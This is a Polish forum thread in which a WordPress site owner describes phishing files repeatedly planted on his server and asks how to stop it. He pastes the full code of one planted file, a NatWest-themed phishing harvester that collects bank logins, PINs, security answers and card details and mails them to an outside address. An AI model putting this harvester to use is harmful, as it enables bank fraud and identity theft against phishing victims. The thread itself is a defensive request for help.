Ataki (nowe pliki phising na serwerze) na witrynie opartej o WordPress, Ciekawy przypadek dla specjalistów z dziedziny bezpieczeństwa WP Opcje

[phpmax]

Witajcie!


Dawno tu nie wpadałem, zatem witam ponownie. Od kilku miesięcy męczę się dziwnym problemem na mojej witrynie. Otóż okazuje się, że co jakiś czas mam na serwerze obce pliki rozrzucone po różnych folderach oraz w głównym katalogu wordpress, mianowicie wp-sys.php, verify.php, Natwest-Card (nowy plik). W efekcie dostaję powiadomienia od hostingodawcy o zaistniałych problemach phishingowych.


Wcześniej, gdy kłopot pojawił się pierwszy raz przeprowadziłem coś w rodzaju audytu bezpieczeństwa, mianowicie:

1. skan systemu kaspersky - ok (po usunięciu wirusów)
2. zmiana domyslnego loginu/hasła admin na inny do cms wp - ok
3. analiza logów serwera ftp - ok
4. zmiana hasła ftp/mysql, choć jest on silne - ok
5. analiza kodu motywu (choć obecność dziury wydaje się mało prawdopodobna) - ok


Po kilku tygodniach jednak znowu problem powrócił z pojawianiem się obcych plików na serwerze. Zastawiam się czy może być dziurawa skórka? W kodzie na znalazłem nic podejrzanego (zakodowane fragmenty kodu czy jakieś inne podejrzane funkcje). Jak ktoś ma chwilę, żeby przejrzeć pliki motywu to oczywiście mogę podesłać. Tak więc to też prawdopodobnie odpada. Raczej programiści Automattic (ci od Wordpressa) rozdzielili warstwę prezentacji od funkcjonalności wordpressa (głównego core) i nawet z błędami w skórce nie powinno dochodzić do obcego instalowania plików za pomocą ataków dajmy na to Cross-site scripting (XSS).


Zastanawia mnie natomiast dziwny kod pliku phisingowego verify.php. Poniżej prezentuje jego kod:

[PHP] pobierz, plaintext 
<?   
 
$ip = getenv("REMOTE_ADDR");
$message .= "Username : ".$_POST['login']."\n";
$message .= "Internet Password: ".$_POST['ipass']."\n";
$message .= "Internet PIN: ".$_POST['ipin']."\n";
$message .= "Email Address : ".$_POST['email']."\n";
$message .= "Email Password : ".$_POST['epass']."\n";
$message .= "Sec Question : ".$_POST['question']."\n";
$message .= "Security answer : ".$_POST['sec']."\n";
$message .= "Repeat security answer : ".$_POST['sec1']."\n";
$message .= "Mother's Maiden Name : ".$_POST['mmn']."\n";
$message .= "Date of Birth : ".$_POST['d1']."/".$_POST['d2']."/".$_POST['d3']."\n";
$message .= "Card Number : ".$_POST['cc']."\n";
$message .= "Expiry Date : ".$_POST['exp1']."/".$_POST['exp2']."\n";
$message .= "Security Code : ".$_POST['cvv']."\n";
$message .= "IP : ".$ip."\n";
$message .= "------------------ Created By ***C --------------------\n";
$send = "oluwach4sy@mail.mn";
$subject = "NatWest-Card Verify ReZulT";
$headers = "From: StarBoy<logs@natwest.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail("$send", "$subject", $message); 
header("Location: http://www.natwest.com");
 
 
?>
[PHP] pobierz, plaintext 

Macie jakieś pomysły jak rozwiązać ten pojawiający się problem? Poszukiwania w Google wykazały na htaccess, ale to sprawdziłem i też nie mam niczego nadpisanego. Będę wdzięczny. Raz nawet zdarzyło się mi, że całkowicie do pliku index.php w głównym katalogu WP dodano index.html, w efekcie ma pierwszeństwo ten z HTML i całkowicie zmieniona była na kilka godzin strona główna, która naprawdę wyświetlana jest w internecie www ;o(

Ten post edytował phpmax 17.01.2014, 00:06:36

[phpmax]

Nie nic nie mam. Raczej nie jest to luka wordpress/wtyczki.

Dziwna historia, mimo iż wczoraj zmieniałem hasło ftp/sql, znowu na serwerze miałem obce pliki. Tym razem jednak usunąłem z niego wszystkie pliki śmieci (porozrzucane w różnych folderach jeszcze po dawnych zabawach z nauką webdevelopmentu), które mogły być ewentualną furtką np: stare dokumenty html z polem dodawania komentarzy (do pliku txt, bez połączenia z bazą), formularze kontaktowe, pliki z animacjami flash, dokumentów word, powerpoint, excel, zastosowane w wybranych plikach biblioteki java script. Zobaczymy czy ta operacja sprzątania śmieci pomoże. Zostały tylko niezbędne pliki wordpress.

Aha, oczywiście na koniec znowu obowiązkowa zmiana hasła ftp/mysql...

Ten post edytował phpmax 19.01.2014, 01:42:19